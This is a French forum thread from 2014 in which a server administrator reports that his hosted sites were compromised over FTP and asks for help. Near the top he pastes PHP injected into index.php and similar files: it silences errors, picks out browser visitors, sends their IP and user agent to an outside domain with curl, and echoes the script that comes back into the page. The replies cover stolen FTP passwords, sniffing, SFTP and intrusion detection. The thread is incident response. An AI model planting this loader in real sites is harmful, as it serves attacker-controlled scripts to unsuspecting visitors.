Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2631 connectés 

  FORUM HardWare.fr
  Systèmes & Réseaux Pro
  Sécurité

  Serveur compromis ... ce type d'attaque vous est-il familier ?

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Serveur compromis ... ce type d'attaque vous est-il familier ?

n°117408
toTOW
http://www.fah-addict.net/
Posté le 05-01-2014 à 23:14:28  profilanswer
 

Bonjour à tous,
 
Aujourd'hui, je viens de me rendre compte que mon serveur avait été compromis. Les premiers symptômes ont été l'apparition de pages blanches sur certains des sites hébergés (problème qui peut disparaitre en environ une journée).
 
J'ai donc décidé de regarder de plus près les pages posant problème, et j'ai remarqué que certains fichiers (principalement du index.php, login.php, header.php, footer.php et leurs variantes) ont été modifiés, et au vu des dates, je sais que ce n'est pas de mon fait.
 
En regardant le contenu des fichiers modifiés, j'ai trouvé ce genre de code :
 

Code :
  1. <?php
  2. #483acf#
  3. error_reporting(0); ini_set('display_errors',0); $wp_t91192 = @$_SERVER['HTTP_USER_AGENT'];
  4. if (( preg_match ('/Gecko|MSIE/i', $wp_t91192) && !preg_match ('/bot/i', $wp_t91192))){
  5. $wp_t0991192="http://"."tag"."modules".".com/modules"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_t91192);
  6. $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_t0991192);
  7. curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_91192t = curl_exec ($ch); curl_close($ch);}
  8. if ( substr($wp_91192t,1,3) === 'scr' ){ echo $wp_91192t; }
  9. #/483acf#
  10. ?>
  11. <?php
  12. ?>
  13. <?php
  14. ?>
  15. <?php
  16. ?>
  17. <?php
  18. ?>


 
Les pages blanches s'expliquent donc par la désactivation des erreurs par ce bout de code, qui à mon avis peut être foireux (il n'est pas toujours identique suivant les fichiers). D'après ce que j'ai compris, ce bout de script va chercher du code sur un serveur distant pour l'exécuter. Je n'ai aucune idée de ce que le code distant fait (mais je soupçonne qu'il tente de propager un trojan ou de de voler des informations). Si quelqu'un a déjà rencontré ce problème, je veux bien quelques explications de plus ...
 
En fouillant dans les logs, j'ai trouvé que les modifications des fichiers proviennent du FTP et qu'elles sont effectuées avec les comptes utilisateurs associés. Je suppose donc que le pirate a réussi à récupérer la liste des mots de passe des comptes FTP, mais pour cette partie, je ne me l'explique pas ...
 
Mon antivirus n'a pas protesté lors du surf sur les pages modifiées, ni lors du scan de mes machines qui vient de se terminer ... :(
 
Si vous avez des idées, n'hésitez pas à m'en faire part ... j'ai un peu peur de me lancer dans le changement de tous les mots de passe et dans le nettoyage des fichiers modifiés en ne sachant pas trop d'où est venue l'obtention des mot de passe FTP ...
 
edit : j'oublais la configuration du serveur (qui commence à dater) : Ubuntu Server 10.04.4 LTS (Lucid Lynx), Apache2, MySQL, PHP5, Proftpd. Tout le monde est bien à jour depuis les dépots.


Message édité par toTOW le 05-01-2014 à 23:16:48

---------------
[b] FAH-Addict, première source d'information francophone sur le projet Folding@Home.  
mood
Publicité
Posté le 05-01-2014 à 23:14:28  profilanswer
 

n°117409
networkinf​o
Posté le 05-01-2014 à 23:20:33  profilanswer
 

Salut
 
Y a des virus qui récupèrent les mots de passe de filezilla par ex
Un bot modifie alors les fichiers automatiquement
 
Change tes pass ftp


Message édité par networkinfo le 05-01-2014 à 23:21:13
n°117410
toTOW
http://www.fah-addict.net/
Posté le 05-01-2014 à 23:36:16  profilanswer
 

J'ai déjà été victime de ce type d'attaque il y a 3 ans (faille flash, puis trojan), mais depuis, je ne stocke plus rien dans firefox/filezilla ... donc même en cas de virus, je doute que ce soit passé par là ... J'avais été bien plus emmerdé cette fois là (tentative d'utilisation du compte mail pour spammer, tentative de vol du solde du compte paypal, ...).
 
Mais depuis j'ai changé de machine ... mais si vous avez des moyens plus efficace qu'un anti virus pour chercher ce type d'infection, je suis preneur !


---------------
[b] FAH-Addict, première source d'information francophone sur le projet Folding@Home.  
n°117412
networkinf​o
Posté le 05-01-2014 à 23:57:11  profilanswer
 

Ca va être dur de voir d'où ça vient
 
bruteforce, sniffing mot de passe ?

n°117416
ShonGail
En phase de calmitude ...
Posté le 06-01-2014 à 00:40:30  profilanswer
 

Tu indiques toi même dans ton 1er post la source : FTP avec des comptes existants.
 
A partir de là, il faut changer les mdp et prévenir les utilisateurs de ces comptes de vérifier qu'ils n'ont pas de virus sur le poste avec leur client FTP.
 
J'ai déjà eu ce problème avec un dev qui avait accès à plusieurs sites et a eu un virus sur son PC qui a récupéré les mdp de son client FTP.

n°117417
toTOW
http://www.fah-addict.net/
Posté le 06-01-2014 à 02:04:10  profilanswer
 

Je viens de passer un deuxième anti virus sur ma machine, il n'a rien trouvé non plus ...
 
Curieusement, il ya deux comptes sur le serveur qui semblent pas avoir été touchés ... :heink:


---------------
[b] FAH-Addict, première source d'information francophone sur le projet Folding@Home.  
n°117422
networkinf​o
Posté le 06-01-2014 à 10:54:02  profilanswer
 

y a des virus qui peuvent ne pas être détectés
Regarde dans les logs si c'est une ip à toi qui s'est connecté pour modifier les fichiers

n°117424
toTOW
http://www.fah-addict.net/
Posté le 06-01-2014 à 11:45:57  profilanswer
 

Non, ce sont des IP de serveurs polonais, hongrois ou espagnols ... probablement compromis eux aussi :(


---------------
[b] FAH-Addict, première source d'information francophone sur le projet Folding@Home.  
n°117428
networkinf​o
Posté le 06-01-2014 à 14:17:28  profilanswer
 

ok donc il reste àa savoir comment ils ont trouvé ton mot de passe
Il est sécurisé ? t'as un fail2ban ? tu te connectes en ftps ? tu l'as envoyé par mail ? ...


Message édité par networkinfo le 06-01-2014 à 14:19:12
n°117444
toTOW
http://www.fah-addict.net/
Posté le 06-01-2014 à 22:05:09  profilanswer
 

Ils font 8 caractères, contenant des majuscules, minuscules et chiffres ...
 
Il y a un fail2ban sur le serveur, je me connecte en FTP et je ne l'ai jamais envoyé par mail.


---------------
[b] FAH-Addict, première source d'information francophone sur le projet Folding@Home.  
mood
Publicité
Posté le 06-01-2014 à 22:05:09  profilanswer
 

n°117467
koorosh
Posté le 07-01-2014 à 19:19:57  profilanswer
 

Bonjour,
 
la première faille c'est l'utilisation du protocole FTP car les données ne sont pas sécurisées et les informations circulent en claires, il suffit de faire  du sniff et  l'attaquant obtiendras  votre MDP , etc ..
 
pour remédier  à cela, utiliser  le Protocol SFTP avec Winscp par exemple.De  plus, utiliser  un générateur de mot de passe comme keepass. Vos mots de passe doivent être minimum du 100 Bits.
 
Ensuite, le rôle d'un anti-virus c'est de  détecter  des  virus sur  un poste OR  pour votre cas  , c'est la situation d'une anomalie réseaux/hotes et pour cela  il faut  mettre  en place  un NIDS et  HIDS ( Snort et OSSEC ) afin qu'ils puissent détecter  tout comportement suspect sur le réseau ou sur les machines.
 
je connais pas bien votre situation, mais  si vus voulez que  je vous aide  à la sécurisation de votre architecture, envoyer  moi plus d'information sur  cette attaque  par message privé.
 
Cordialement,
(Désoler des fautes d'orthographes)
Nicolas


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Systèmes & Réseaux Pro
  Sécurité

  Serveur compromis ... ce type d'attaque vous est-il familier ?

 

Sujets relatifs
impossible d'ouvir le voisinage reseau de domaine 2008 serveurMigration imprimante suite à migration serveur d'impression
Cartes réseaux qui se déconnectent sur un serveur Windows 2008 R2Crypter mon serveur
Quel serveur web (Open Source) pour transfert sécurisé de fichiers ?serveur redhat 5 entreprise serveur proxy
Un serveur DHCP/Antivirus/WSUS/etc - 2 VLANUrgent - Achat d'un nouveau serveur
Plus de sujets relatifs à : Serveur compromis ... ce type d'attaque vous est-il familier ?


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR